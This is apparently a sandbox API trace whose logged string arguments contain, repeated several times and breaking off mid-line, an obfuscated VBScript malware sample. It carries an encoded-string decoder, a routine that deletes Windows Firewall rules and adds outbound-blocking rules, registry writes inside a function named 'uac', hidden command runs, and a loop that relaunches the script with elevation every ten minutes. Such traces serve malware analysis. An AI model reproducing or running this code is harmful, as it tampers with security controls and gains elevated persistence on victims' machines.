bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.279] wcsncmp (_String1="xt\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 107 [0226.279] wcsncmp (_String1="t\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0226.279] wcsncmp (_String1="\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -26 [0226.279] wcsncmp (_String1="\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite 